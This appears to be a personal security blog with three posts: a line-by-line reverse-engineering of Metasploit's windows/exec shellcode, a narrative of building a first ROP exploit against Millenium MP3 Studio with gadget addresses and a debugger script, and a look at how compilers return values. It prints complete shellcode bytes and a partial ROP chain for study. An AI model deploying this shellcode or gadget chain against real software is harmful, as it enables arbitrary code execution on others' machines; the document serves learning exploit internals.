Tuesday, November 13, 2012

Understanding Windows shellcode 3

I recently gained some experience with Return Oriented Programming, but my first attempt to build a ROP-based exploit on my own failed (read about it here). To solve the problem I had to understand exactly what went wrong, and that forced me to read and understand the shellcode I had chosen.

I had chosen windows/exec, and a breakpoint placed just before it showed me that the decoder did in fact run and decode the shellcode. The decoded shellcode was also an exact match with the code I had encoded. So...on with the reversing.

The first thing to do was to generate a disassembly of the windows/exec shellcode, which I got like this:

$ msfpayload windows/exec CMD=calc R | ndisasm -b 32 -

This is the disassembly in its entirety:

00000000  FC                cld
00000001  E889000000        call dword 0x8f
00000006  60                pushad
00000007  89E5              mov ebp,esp
00000009  31D2              xor edx,edx
0000000B  648B5230          mov edx,[fs:edx+0x30]
0000000F  8B520C            mov edx,[edx+0xc]
00000012  8B5214            mov edx,[edx+0x14]
00000015  8B7228            mov esi,[edx+0x28]
00000018  0FB74A26          movzx ecx,word [edx+0x26]
0000001C  31FF              xor edi,edi
0000001E  31C0              xor eax,eax
00000020  AC                lodsb
00000021  3C61              cmp al,0x61
00000023  7C02              jl 0x27
00000025  2C20              sub al,0x20
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
0000002C  E2F0              loop 0x1e
0000002E  52                push edx
0000002F  57                push edi
00000030  8B5210            mov edx,[edx+0x10]
00000033  8B423C            mov eax,[edx+0x3c]
00000036  01D0              add eax,edx
00000038  8B4078            mov eax,[eax+0x78]
0000003B  85C0              test eax,eax
0000003D  744A              jz 0x89
0000003F  01D0              add eax,edx
00000041  50                push eax
00000042  8B4818            mov ecx,[eax+0x18]
00000045  8B5820            mov ebx,[eax+0x20]
00000048  01D3              add ebx,edx
0000004A  E33C              jecxz 0x88
0000004C  49                dec ecx
0000004D  8B348B            mov esi,[ebx+ecx*4]
00000050  01D6              add esi,edx
00000052  31FF              xor edi,edi
00000054  31C0              xor eax,eax
00000056  AC                lodsb
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
0000005C  38E0              cmp al,ah
0000005E  75F4              jnz 0x54
00000060  037DF8            add edi,[ebp-0x8]
00000063  3B7D24            cmp edi,[ebp+0x24]
00000066  75E2              jnz 0x4a
00000068  58                pop eax
00000069  8B5824            mov ebx,[eax+0x24]
0000006C  01D3              add ebx,edx
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
00000072  8B581C            mov ebx,[eax+0x1c]
00000075  01D3              add ebx,edx
00000077  8B048B            mov eax,[ebx+ecx*4]
0000007A  01D0              add eax,edx
0000007C  89442424          mov [esp+0x24],eax
00000080  5B                pop ebx
00000081  5B                pop ebx
00000082  61                popad
00000083  59                pop ecx
00000084  5A                pop edx
00000085  51                push ecx
00000086  FFE0              jmp eax
00000088  58                pop eax
00000089  5F                pop edi
0000008A  5A                pop edx
0000008B  8B12              mov edx,[edx]
0000008D  EB86              jmp short 0x15
0000008F  5D                pop ebp
00000090  6A01              push byte +0x1
00000092  8D85B9000000      lea eax,[ebp+0xb9]
00000098  50                push eax
00000099  68318B6F87        push dword 0x876f8b31
0000009E  FFD5              call ebp
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
000000A5  68A695BD9D        push dword 0x9dbd95a6
000000AA  FFD5              call ebp
000000AC  3C06              cmp al,0x6
000000AE  7C0A              jl 0xba
000000B0  80FBE0            cmp bl,0xe0
000000B3  7505              jnz 0xba
000000B5  BB4713726F        mov ebx,0x6f721347
000000BA  6A00              push byte +0x0
000000BC  53                push ebx
000000BD  FFD5              call ebp
000000BF  63616C            arpl [ecx+0x6c],sp
000000C2  6300              arpl [eax],ax

This supposedly executes "calc".

Let's cut it up a little and comment on what happens. From my point of view the code consists of three overall stages: Setup, "Magic" function and execution.

Setup

;Make LOD* instructions increment addresses
00000000  FC                cld
;Push EIP onto stack so that we know where we are...then jump to 0x8f
;The value pushed is the address of the instruction following the call.
00000001  E889000000        call dword 0x8f
;..... Here lies the magic function
;Pop the address into EBP so that it contains the address of the magic function
0000008F  5D                pop ebp

Setup is short. The magic function will use LOD* instructions and they should move from low to high addresses, so the direction flag is cleared. Then the code calls past the magic function to a POP EBP so that EBP contains the address of the function.

Now setup is done.
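
The address arithmetic behind the CALL/POP trick can be checked with a few lines of Python. This is only a sketch using offsets relative to the start of the shellcode, taken from the disassembly above; the variable names are my own.

```python
# Offsets are relative to the start of the shellcode, as in the ndisasm listing.
CALL_OFFSET = 0x01        # where "call dword 0x8f" starts
CALL_LENGTH = 5           # opcode E8 plus a 4-byte relative displacement
CALL_DISPLACEMENT = 0x89  # the 89 00 00 00 part of the encoding

# CALL pushes the address of the instruction that follows it...
return_address = CALL_OFFSET + CALL_LENGTH
# ...and continues at that address plus the displacement.
call_target = return_address + CALL_DISPLACEMENT

# POP EBP at the call target loads the pushed value, so EBP now
# holds the address of the magic function.
ebp = return_address

# Later on, "lea eax,[ebp+0xb9]" uses EBP to find the command string.
command_string = ebp + 0xB9

print(hex(return_address), hex(call_target), hex(command_string))
```

In a real process the same relations hold, just shifted by wherever the shellcode happens to be loaded.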

Execution

I will describe the magic function later since it is quite large...for now know that it locates other functions and executes them.

;Push the value 1 onto the stack (this is actually the second argument to WinExec)
00000090  6A01              push byte +0x1
;Load the address of the "calc" string at 0xbf into EAX
00000092  8D85B9000000      lea eax,[ebp+0xb9]
;Push the address of "calc" onto the stack (first argument to WinExec)
00000098  50                push eax
;Push the value 0x876f8b31 onto the stack...this is a hash and will be explained later
00000099  68318B6F87        push dword 0x876f8b31
;Call the function at 0x6...the function will return to the next instruction
0000009E  FFD5              call ebp
;Put the value 0x56a2b5f0 into EBX...also a hash
000000A0  BBF0B5A256        mov ebx,0x56a2b5f0
;Put value 0x9dbd95a6 onto stack...you guessed it, it's a hash
000000A5  68A695BD9D        push dword 0x9dbd95a6
;Call the magic function
000000AA  FFD5              call ebp
;Compare low byte in EAX register to the value 6
000000AC  3C06              cmp al,0x6
;If it is less than 6, go to 0xba and skip the next section which may change the
;hash that was put into EBX at address 0xa0
000000AE  7C0A              jl 0xba
;Compare low part of EBX to 0xe0 (at first this didn't make sense
;as EBX at this point is 0x56a2b5f0 and thus BL is 0xf0 but there is an explanation)
000000B0  80FBE0            cmp bl,0xe0
;If it is not equal, go to 0xba...it will not be equal in our example, so we jump
000000B3  7505              jnz 0xba
;If we got here then change EBX to 0x6f721347
000000B5  BB4713726F        mov ebx,0x6f721347
;Now...push a zero onto the stack (first argument for ExitProcess)
000000BA  6A00              push byte +0x0
;Push the hash...whatever it is (either 0x56a2b5f0 or 0x6f721347)
000000BC  53                push ebx
;Again...call the magic function
000000BD  FFD5              call ebp 
;Yes...these are not instructions but rather the name of the program to execute 
000000BF  63616C6300        db "calc",0

Pseudocode of the above looks something like this:

MagicFunction(HASH(WinExec), "calc", SW_SHOWNORMAL);
DWORD version = MagicFunction(HASH(GetVersion));
if (LOBYTE(LOWORD(version)) >= 6 && (unsigned char)hash_of_chosen_exitmethod == 0xe0) {
    /* We are on Windows Vista, Windows 2008, Windows 7 or Windows 8
     * and the penetration tester chose to use ExitThread.
     * Use RtlExitUserThread instead.
     */
    hash_of_chosen_exitmethod = HASH(RtlExitUserThread);
}
MagicFunction(hash_of_chosen_exitmethod, 0);

What does all this mean ?
The magic function (which we will look at in a moment) takes a hash of the function that we want to call combined with a hash of the dll that contains the function, plus any arguments to the function we want to call.

So we start by having it invoke WinExec with "calc" and SW_SHOWNORMAL.
After that we call an exit function. We can override which function should be used by specifying the EXITFUNC option to 'msfpayload'. Valid options are 'process' which corresponds to ExitProcess, 'thread' which corresponds to ExitThread, 'seh' which is SetUnhandledExceptionFilter, and 'none' which will just call GetLastError.

As we can see, the shellcode will not use ExitThread when GetVersion reports a major version of 6 or higher, that is, on anything newer than XP. In that case RtlExitUserThread is called instead.
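
The exit function selection is easy to play with in Python. This is a minimal sketch of the two compares at 0xac and 0xb0. The ExitProcess and RtlExitUserThread hashes come from the listing; the ExitThread hash does not appear in this payload, so treat that constant as my assumption. The version values in the usage lines are simplified examples, not real GetVersion results.

```python
EXIT_PROCESS = 0x56A2B5F0          # from the listing (mov ebx at 0xa0)
RTL_EXIT_USER_THREAD = 0x6F721347  # from the listing (mov ebx at 0xb5)
EXIT_THREAD = 0x0A2A1DE0           # assumption: hash used for EXITFUNC=thread

def choose_exit_hash(version, exit_hash):
    """Mimic the checks made between 0xac and 0xb5."""
    major = version & 0xFF                  # cmp al,0x6 only looks at the low byte
    low_byte_of_hash = exit_hash & 0xFF     # cmp bl,0xe0 only looks at BL
    if major >= 6 and low_byte_of_hash == 0xE0:
        return RTL_EXIT_USER_THREAD
    return exit_hash

# Simplified example versions: low byte is the major version, next byte the minor.
print(hex(choose_exit_hash(0x0105, EXIT_THREAD)))   # major 5: hash is kept
print(hex(choose_exit_hash(0x0106, EXIT_THREAD)))   # major 6: hash is swapped
print(hex(choose_exit_hash(0x0106, EXIT_PROCESS)))  # BL is 0xf0: hash is kept
```

Only the low byte of the hash is compared, which is enough here because none of the other exit hashes in this post end in 0xe0.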

So, now we know what functions will be called. Let's take a look at the magic function to see how this is actually done.

Magic function

The magic function is not actually magic, but it is very clever. It is a sort of hashed linker using skape's trick for finding a function inside a dll by the hash of its name, but instead of us having to specify the base address of the dll to search, this function searches all loaded dlls for a function matching the hash.
The hash is formed by adding the hash of the dll's name to the hash of the function's name. The arguments to the not so magic but clever function are the hash to search for, followed by the arguments to the function being searched for. This may be better explained with pseudo code:

function MagicFunction(long hash, ...) {
    for each loaded dll {
        dll_name_hash = hash(dll.name);
        for each exported symbol {
            symbol_hash = hash(symbol);
            combined_hash = dll_name_hash + symbol_hash;
            if (combined_hash == hash) {
                remove_hash_from_stack;
                put_return_address_on_stack;
                jump(symbol);
            }
        }
    }
}

Something like that. The function removes the hash from the stack and puts the original return address in its place, so the jump to the found function acts like a call. When the found function returns, it does not return into MagicFunction but to the location where MagicFunction was called. Very clever. Let's see how this is actually done.

;Preserve all registers, except EAX, ECX and EDX (as we will see in the end)
00000006  60                pushad
;Build new stack frame, just like a compiler generated function
00000007  89E5              mov ebp, esp
;Zero out EDX
00000009  31D2              xor edx, edx
;Get pointer to PEB into EDX
;FS register points to TEB: http://www.nirsoft.net/kernel_struct/vista/TEB.html
;FS+0x30 is the PEB: http://www.nirsoft.net/kernel_struct/vista/PEB.html
0000000B  648B5230          mov edx,[fs:edx+0x30]
;Get address of LDR into EDX
;http://www.nirsoft.net/kernel_struct/vista/PEB_LDR_DATA.html
0000000F  8B520C            mov edx,[edx+0xc]
;Get address of InMemoryOrderModuleList list entry into EDX
00000012  8B5214            mov edx,[edx+0x14]

Now EDX points to the first list entry in memory order. Here begins a loop through all entries in the list.

;We will loop here so we put a label
check_next_dll:
;Get address of base dll name unicode string into ESI
;http://www.nirsoft.net/kernel_struct/vista/LDR_DATA_TABLE_ENTRY.html
;http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
00000015  8B7228            mov esi,[edx+0x28]
;Get maximum length of base dll name unicode string into ECX
00000018  0FB74A26          movzx ecx,word [edx+0x26]
;Initialize hash to zero
0000001C  31FF              xor edi,edi

Now ESI points to the dll name in Unicode, ECX contains the maximum length in bytes (number of bytes used for the name plus null terminator) and EDI is zero. EDI will eventually contain the hash.
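
The offsets 0x26 and 0x28 (and 0x10, which is used a little later for the module base) look odd next to the structure definitions linked above. The reason is that EDX does not point to the start of the LDR_DATA_TABLE_ENTRY but to its InMemoryOrderLinks member. A small Python sketch of the arithmetic, using the 32-bit field offsets as I read them from those structure definitions:

```python
# 32-bit LDR_DATA_TABLE_ENTRY field offsets, counted from the start of the entry.
IN_MEMORY_ORDER_LINKS = 0x08
DLL_BASE = 0x18
BASE_DLL_NAME = 0x2C          # a UNICODE_STRING

# 32-bit UNICODE_STRING member offsets.
US_MAXIMUM_LENGTH = 0x02
US_BUFFER = 0x04

def relative_to_list_entry(field_offset):
    """Offset of a field as seen from a pointer to InMemoryOrderLinks."""
    return field_offset - IN_MEMORY_ORDER_LINKS

offsets = {
    "DllBase": relative_to_list_entry(DLL_BASE),
    "BaseDllName.MaximumLength": relative_to_list_entry(BASE_DLL_NAME + US_MAXIMUM_LENGTH),
    "BaseDllName.Buffer": relative_to_list_entry(BASE_DLL_NAME + US_BUFFER),
}

for name, offset in offsets.items():
    print(name, hex(offset))
```

The three results are exactly the displacements used in the shellcode.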

Now we enter a hashing loop.

load_next_character:
;AL will contain a character but the high bits need to be zeroed
0000001E  31C0              xor eax,eax
;Load next byte from address pointed to by ESI into AL and increment ESI by one
00000020  AC                lodsb
;Compare to 'a'
00000021  3C61              cmp al,'a'
;If less than then the character is already uppercase or punctuation
00000023  7C02              jl upper_case
;Subtract 0x20 to make upper case
00000025  2C20              sub al,0x20
upper_case:
;Update hash in EDI
00000027  C1CF0D            ror edi,0xd
0000002A  01C7              add edi,eax
;If we have more characters in the string...
0000002C  E2F0              loop load_next_character

Now EDI contains the hash of the dll name, and EDX still points to the dll's entry in the memory order list. Next we will find the current dll's export list so that we can iterate through all exported functions.

;Save dll list entry
0000002E  52                push edx
;Save dll name hash
0000002F  57                push edi
;Put current modules base addr in EDX
00000030  8B5210            mov edx,[edx+0x10]
;Put PE header offset into EAX
00000033  8B423C            mov eax,[edx+0x3c]
;Make address absolute
00000036  01D0              add eax,edx
;Put offset of exports into EAX
00000038  8B4078            mov eax,[eax+0x78]
;If offset is zero (meaning no exports?)
0000003B  85C0              test eax,eax
;...then go past the code that looks at the export table
0000003D  744A              jz not_found
;...otherwise make address absolute
0000003F  01D0              add eax,edx
;Save address of exports
00000041  50                push eax
;Put number of exported symbols into ECX
00000042  8B4818            mov ecx,[eax+0x18]
;Put offset of names into EBX
00000045  8B5820            mov ebx,[eax+0x20]
;Make address absolute
00000048  01D3              add ebx,edx

At this point ECX contains the number of exported names, EBX points to the first entry in the export name table and EDX points to the dll base address. The entries in the name table are offsets to where each name lies in memory.

Next comes a loop over all the exported symbols.

;Here we start a loop that runs over all exported symbols
next_symbol:
;If there are no more exported symbols
0000004A  E33C              jecxz no_more_symbols
;Decrement ECX so that we can use it as an offset into the export list
0000004C  49                dec ecx
;Put offset of name into ESI
0000004D  8B348B            mov esi,[ebx+ecx*4]
;Make absolute
00000050  01D6              add esi,edx
;Initialize EDI to zero. EDI will hold the hash of the name
00000052  31FF              xor edi,edi
;Here starts a loop that hashes the name
next_symbol_char:
;AL will contain the next character but the higher bits need zeroing
00000054  31C0              xor eax,eax
;Read next character
00000056  AC                lodsb
;Update hash
00000057  C1CF0D            ror edi,0xd
0000005A  01C7              add edi,eax
;Have we reached the end (zero terminated string)? AH is always zero after the XOR above
0000005C  38E0              cmp al,ah
;If not, read next character
0000005E  75F4              jnz next_symbol_char
;Hash is complete. Combine dll name (at EBP-8) hash with symbol hash
00000060  037DF8            add edi,[ebp-0x8]
;Compare combined hash to first argument to magic function
00000063  3B7D24            cmp edi,[ebp+0x24]
;If not the same try next symbol
00000066  75E2              jnz next_symbol
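
The two hashing loops and the final addition can be reproduced in Python. This is a sketch based on my reading of the assembly above, not the script Metasploit uses to generate its constants. It assumes that the maximum length of the dll name covers the name plus its two-byte terminator, as described earlier.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right, like ROR EDI,0xd."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF

def hash_bytes(data, uppercase=False):
    h = 0
    for b in data:
        # cmp al,'a' / jl / sub al,0x20 (signed compare, so only 0x61..0x7f change)
        if uppercase and 0x61 <= b <= 0x7F:
            b -= 0x20
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h

def module_hash(name):
    # The loader stores the name as UTF-16; every byte is hashed,
    # including the zero bytes and the terminator.
    return hash_bytes((name + "\0").encode("utf-16-le"), uppercase=True)

def symbol_hash(name):
    # Export names are plain zero terminated strings; the terminator is hashed too.
    return hash_bytes((name + "\0").encode("ascii"))

def combined_hash(module, symbol):
    return (module_hash(module) + symbol_hash(symbol)) & 0xFFFFFFFF

print(hex(combined_hash("kernel32.dll", "WinExec")))
```

Running it gives the value that is pushed at 0x99 before the first call to the magic function.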

If we get past the JNZ instruction it is because the hash matched. In that case the corresponding function should be executed but first its location needs to be found and the stack must be prepared so that it looks like it was called normally.
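At this point the stack looks like this (top of the stack first):

ESP+0x00  address of the export table (pushed at 0x41)
ESP+0x04  dll name hash (pushed at 0x2f)
ESP+0x08  dll list entry (pushed at 0x2e)
ESP+0x0c  registers saved by PUSHAD (EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX)
ESP+0x2c  return address
ESP+0x30  hash (first argument to the magic function)
ESP+0x34  pointer to "calc" (first argument to WinExec)
ESP+0x38  1 (second argument to WinExec)
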
The return address is the address of the instruction following the 'CALL EBP' which invoked the magic function. It is the address we want WinExec to return to, so when we have found WinExec we need to remove all the other stuff on the stack and put the return address where the hash is now. Let's see how this happens.

;Restore export table address
00000068  58                pop eax
;Get offset of ordinals into EBX
00000069  8B5824            mov ebx,[eax+0x24]
;Make absolute
0000006C  01D3              add ebx,edx
;Get ordinal of symbol into CX (ordinals are 16 bits)
0000006E  668B0C4B          mov cx,[ebx+ecx*2]
;Offset of function table into EBX
00000072  8B581C            mov ebx,[eax+0x1c]
;Make absolute
00000075  01D3              add ebx,edx
;Put offset of function into EAX
00000077  8B048B            mov eax,[ebx+ecx*4]
;Make absolute
0000007A  01D0              add eax,edx
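
The three table lookups are easier to follow with the tables written out as plain lists. This is a simplified Python sketch: the real code compares hashes rather than names and reads the tables from memory, and the names, ordinals and offsets below are made up for illustration.

```python
def resolve_export(base, names, name_ordinals, functions, wanted):
    """Follow name table -> ordinal table -> function table, like the shellcode."""
    # The shellcode counts ECX down, so it walks the name table backwards.
    for index in range(len(names) - 1, -1, -1):
        if names[index] == wanted:
            ordinal = name_ordinals[index]   # 16-bit entries: [ebx+ecx*2]
            offset = functions[ordinal]      # 32-bit entries: [ebx+ecx*4]
            return base + offset             # make absolute
    return None                              # no more symbols in this dll

# Hypothetical export tables for a dll loaded at 0x10000000.
base = 0x10000000
names = ["Alpha", "Beta", "Gamma"]
name_ordinals = [2, 0, 1]
functions = [0x1100, 0x1200, 0x1300]

print(hex(resolve_export(base, names, name_ordinals, functions, "Alpha")))
```

Note that the index into the name table is not used directly on the function table. It first goes through the ordinal table, which is why CX is reloaded at 0x6e.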

Now we have the address of the function in EAX. Next we fix the stack.

;Replace PUSHADed EAX
0000007C  89442424          mov [esp+0x24],eax
;Remove top item on stack (dll name hash; the export table address was already popped at 0x68)
00000080  5B                pop ebx
;Remove top item on stack (dll list entry)
00000081  5B                pop ebx
;Restore all registers and remove PUSHADed data
00000082  61                popad
;Get original return address
00000083  59                pop ecx
;Remove hash
00000084  5A                pop edx
;Restore return address
00000085  51                push ecx
;Now simply jump to the function, it will look like it was simply called
00000086  FFE0              jmp eax

The last four instructions do the clever "call" to the found function. WinExec will see the original return address and two arguments, believing it was called normally.
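
The stack juggling can be replayed in Python with a list standing in for the stack. This is only a sketch of the instructions from 0x68 to 0x86; the function address in the usage line is made up.

```python
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def simulate_tail(return_address, wanted_hash, args, function_address):
    """Replay 0x68..0x86. The last list element is the top of the stack."""
    # State on entry to the magic function: arguments, hash, return address.
    stack = list(reversed(args)) + [wanted_hash, return_address]
    stack += ["saved " + reg for reg in PUSHAD_ORDER]             # pushad
    stack += ["dll list entry", "dll name hash", "export table"]  # push edx/edi/eax

    stack.pop()                                   # pop eax (export table)
    stack[-1 - 0x24 // 4] = function_address      # mov [esp+0x24],eax
    stack.pop()                                   # pop ebx (dll name hash)
    stack.pop()                                   # pop ebx (dll list entry)
    regs = {}
    for reg in reversed(PUSHAD_ORDER):            # popad restores EDI first, EAX last
        regs[reg] = stack.pop()
    ecx = stack.pop()                             # pop ecx (return address)
    stack.pop()                                   # pop edx (discard the hash)
    stack.append(ecx)                             # push ecx
    return regs["EAX"], stack                     # jmp eax

eax, stack = simulate_tail(0xA0, 0x876F8B31, [0xBF, 1], 0x7C8623AD)
print(hex(eax), [hex(slot) for slot in stack])
```

What is left on the stack is the return address on top of the two arguments, exactly what WinExec would see after a normal CALL.
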
We have now covered the most interesting parts of the magic function but there are still five instructions left to cover. Earlier we jumped to 'no_more_symbols' if the iteration through the symbol table reached the end, or to 'not_found' if no symbol table was found. Those two jumps were to locations past the execution of the found function and they follow here:

;We jump here if we have moved past all symbols in the dll
no_more_symbols:
;Restore address of exports structure
00000088  58                pop eax
;We jump here if no exports table was found
not_found:
;Remove saved dll name hash
00000089  5F                pop edi
;Restore address of current in memory order module list entry
0000008A  5A                pop edx
;Follow linked list to next entry
0000008B  8B12              mov edx,[edx]
;Check next dll
0000008D  EB86              jmp check_next_dll

Now the analysis is complete. One thing to note about this last bit is that the function you look for had better be found. Otherwise the program will certainly crash as there is no check for having reached the last entry in the linked list.

I hope you will agree that this function is not really magic but rather a thing of beauty. It is very generic and thus can be used as a basic building block in all shellcodes. And this is exactly what has happened. If you look in all Windows payloads in Metasploit you will see this function.

After I had reverse engineered the windows/exec shellcode someone told me that I could have read the original assembly source with comments. It is located in 'external/source/shellcode/windows/x86/src/single/single_exec.asm'.

While this is true, I believe that I got more out of doing the hard work myself. When reverse engineering you really have to understand all the details and look up documentation on the different structures that are used. When reading the comments I have a tendency to skip this and just trust the comments.

I hope you enjoyed this as much as I did.

Monday, August 6, 2012

Lesson learned from my first ROP exploit

I have been following corelanc0d3r's excellent exploit writing tutorials and I have finished the one about Return Oriented Programming. That was easier than I had thought.

But I wanted to test myself to see if I had really understood the technique and it turned out that I still had a lot to learn (surprise!).

The software I chose to work on was Millenium MP3 Studio which was the topic of a Corelan tutorial on SEH exploitation. I had exploited this one previously so I kind of knew what was going on.

I chose to go for a call to VirtualProtect, as in the Corelan ROP tutorial. There was a lengthy list of bad characters (in the beginning I only knew about 0x00, 0x0a and 0x0d, but more came up later), which narrowed down which addresses and other data could be expressed.

The Immunity Debugger is an excellent tool and I recommend it highly, and with the Mona.py command exploitation gets much easier. I collected the ROP gadgets found by Mona and started digging for useful ones.

I found a gadget that could pivot the stack into my payload:
0x10019d3c   ADD ESP, 0x41c # RETN

...thus, my chain could begin.

I needed a chain that could write an arbitrary number to an arbitrary address. This was not really difficult but quite time consuming. I ended up with this:
0x100205d8  # POP ESI # RETN
0x1001c348  # POP EAX # RETN
0x100205d5  # SUB EAX, ESI # POP EDI # POP ESI # RETN
0x1001f826  # POP ECX # RETN
0x1001f826  # ADD ECX, ESI # MOV DWORD PTR DS:[EAX], ECX # MOV EAX, 1 # POP EDI # POP ESI # POP EBX # RETN

The first three enable me to put any value into EAX. The last one is quite cool as it both builds the data to be written in ECX and then writes it to the address pointed to by EAX. Both the third and the last gadget end by popping into ESI, so after the first round I did not have to use the "POP ESI # RETN" gadget again. Very cool.
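
The reason for the POP/POP/SUB dance is the bad characters: a value such as 0x00000040 cannot be placed in the payload directly, but two "clean" values whose difference is 0x40 can. Here is a minimal Python sketch of how such a pair could be found. The helper is my own illustration, and the bad character set is just the three bytes I knew about at the start.

```python
def split_without_bad_bytes(target, bad_bytes):
    """Return (a, b) with (a - b) mod 2**32 == target and no bad byte in either.

    Works byte by byte from the low end, carrying like a normal addition
    (a = target + b). Returns None if some byte position has no solution.
    """
    allowed = [value for value in range(256) if value not in bad_bytes]
    a = b = carry = 0
    for shift in (0, 8, 16, 24):
        t = (target >> shift) & 0xFF
        for b_byte in allowed:
            total = t + b_byte + carry
            if (total & 0xFF) not in bad_bytes:
                a |= (total & 0xFF) << shift
                b |= b_byte << shift
                carry = total >> 8
                break
        else:
            return None
    return a, b

bad = {0x00, 0x0A, 0x0D}
a, b = split_without_bad_bytes(0x00000040, bad)
print(hex(a), hex(b), hex((a - b) & 0xFFFFFFFF))
```

With this pair, b would be popped into ESI and a into EAX, and "SUB EAX, ESI" leaves the wanted value in EAX.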

Now, with this chain things took off. I could simply replay it several times with different data put into ESI, EAX and ECX (the other registers just contain garbage as they are not actually used).

The last part of the exploit needed to adjust the stack to point to my VirtualProtect arguments and I chose this gadget:
0x1001c611  # MOV ESP, EBP # POP EBP # RETN

So I just needed to put the address into EBP first. For that I used these gadgets:
0x10017f66  # POP EBP # RETN
0x1001ff4f  # POP EBX # RETN
0x10017a18  # AND AL, 0x22 # SUB EBP, EBX # OR DH, DH # RETN

And it worked!
Well, sort of...actually not.

My ROP chain ran beautifully, VirtualProtect was called with all the right parameters, it returned into my shellcode, shikata ga nai ran and decoded the payload, the payload ran and called WinExec...but WinExec failed with a return code meaning ERROR_FILE_NOT_FOUND.
Why?

Actually, I had no idea how much of the shellcode actually ran, but I could see that shikata ga nai ran and decoded the payload and that the result matched the one I had chosen. I had to reverse engineer the payload (windows/exec from Metasploit) to discover what went wrong. This is a very cool payload and I will probably write a blog post about it. For now, just know that it makes a call to WinExec and it failed.

I tried building the stack by hand using Immunity Debugger and returning into VirtualProtect. That worked fine and "calc" was executed. Why?

Obviously my ROP code altered something critical, but what?

I then tried a binary search, running half my chain, then building the stack and returning. "calc" ran.

This took a lot of tries so I ended up writing my first Immunity Debugger PyCommand:
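import immlib

def main(args):
    imm = immlib.Debugger()
    # Overwrite the top of the stack with a hand-built call frame
    stack = imm.getRegs()['ESP']
    data = "\xd0\x1a\x80\x7c"   # 0x7c801ad0: address to return into (presumably VirtualProtect)
    data += "\xe2\x5d\x13\x00"  # 0x00135de2: return address after the call (presumably the shellcode)
    data += "\xe2\x5d\x13\x00"  # 0x00135de2: lpAddress
    data += "\xe2\x00\x00\x00"  # 0x000000e2: dwSize
    data += "\x40\x00\x00\x00"  # 0x00000040: flNewProtect (PAGE_EXECUTE_READWRITE)
    data += "\x10\x90\x03\x10"  # 0x10039010: lpflOldProtect
    imm.writeMemory(stack, data)
    return "[*] PyCommand Executed...YAY"
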
That sped things up, but "calc" ran every time. Except after having modified the stack pointer...the very last ROP gadget.
And then it hit me. The stack ended up not being aligned on a four byte boundary, and apparently that was not a problem for VirtualProtect, nor for shikata ga nai, nor for the shellcode but WinExec had a problem with it.
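
Checking for this is trivial once you know to look for it. A minimal Python sketch, with made-up stack addresses:

```python
def is_aligned(address, boundary=4):
    """True if the address is a multiple of the boundary."""
    return address % boundary == 0

def align_down(address, boundary=4):
    """Round an address down to the nearest multiple of a power-of-two boundary."""
    return address & ~(boundary - 1)

# Hypothetical stack pointer values.
for esp in (0x0013F7A0, 0x0013F7A2):
    print(hex(esp), is_aligned(esp), hex(align_down(esp)))
```

In an exploit the fix is usually made on the data side, by padding the payload so that the pivoted stack pointer ends up on a multiple of four.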

Aligning the data fixed the problem...I get "calc" now.
The resulting exploit can be found here and I have posted a demo video here.

I am not quite happy with the result as there are still problems. I hardcoded some stack addresses. They seemed stable on a particular version of Windows, so on the command line for the exploit you choose the version of Windows that you are exploiting (only XP SP 2 and 3 are supported at the moment). However, I am not sure they really are stable. I did a couple of reboots and the stack was still at those addresses, but this strikes me as odd. Why have ASLR and not randomize the stack?

In my next ROP exploit I will calculate all addresses...no more hardcoding.

Lessons learned:

  • Align stack on four byte boundary
  • Finding a useful ROP chain is time consuming
  • When a useful ROP chain has been found things really take off
  • Immunity Debugger PyCommands are very cool and need more looking into
  • GDB can also be scripted using Python
  • You can learn a lot by reversing Metasploit payloads
  • You can learn a lot by screwing up

Monday, July 16, 2012

Returning data from functions

I have been wondering...is the return value from functions always in EAX/RAX?

This cannot be. If you return floating point data or an entire structure, how can that be fitted inside EAX?

I have also been taught that returning a struct is bad. Is this really so? Let's find out.

First we'll write some simple C code and see how the compiler implements it:

int return_int(int a, int b) {
    return a + b;
}

float return_float(float a, float b) {
    return a + b;
}

double return_double(double a, double b) {
    return a + b;
}

long long return_longlong(long long a, long long b) {
    return a + b;
}

struct my_struct {
    int a;
    int b;
    int c;
    int d;
    int e;
};

struct my_struct return_my_struct(int a, int b) {
    struct my_struct s;
    s.a = a;
    s.b = b;
    s.c = a + b;
    s.d = a * b;
    s.e = 7;
    return s;
}

int main(int argc, char const *argv[]) {
    return 0;
}

Alright. Let's take a look at the return_int function:

(gdb) disassemble return_int
Dump of assembler code for function return_int:
   0x00000000004004b4 <+0>: push   rbp
   0x00000000004004b5 <+1>: mov    rbp,rsp
   0x00000000004004b8 <+4>: mov    DWORD PTR [rbp-0x4],edi
   0x00000000004004bb <+7>: mov    DWORD PTR [rbp-0x8],esi
   0x00000000004004be <+10>: mov    eax,DWORD PTR [rbp-0x8]
   0x00000000004004c1 <+13>: mov    edx,DWORD PTR [rbp-0x4]
   0x00000000004004c4 <+16>: add    eax,edx
   0x00000000004004c6 <+18>: pop    rbp
   0x00000000004004c7 <+19>: ret    
End of assembler dump.
(gdb) 

The int datatype fits nicely into eax so this is used here. What about float ?

(gdb) disassemble return_float
Dump of assembler code for function return_float:
   0x00000000004004c8 <+0>: push   rbp
   0x00000000004004c9 <+1>: mov    rbp,rsp
   0x00000000004004cc <+4>: movss  DWORD PTR [rbp-0x4],xmm0
   0x00000000004004d1 <+9>: movss  DWORD PTR [rbp-0x8],xmm1
   0x00000000004004d6 <+14>: movss  xmm0,DWORD PTR [rbp-0x4]
   0x00000000004004db <+19>: addss  xmm0,DWORD PTR [rbp-0x8]
   0x00000000004004e0 <+24>: pop    rbp
   0x00000000004004e1 <+25>: ret    
End of assembler dump.
(gdb) 

This time xmm0 is used, and the same goes for double:

(gdb) disassemble return_double
Dump of assembler code for function return_double:
   0x00000000004004e2 <+0>: push   rbp
   0x00000000004004e3 <+1>: mov    rbp,rsp
   0x00000000004004e6 <+4>: movsd  QWORD PTR [rbp-0x8],xmm0
   0x00000000004004eb <+9>: movsd  QWORD PTR [rbp-0x10],xmm1
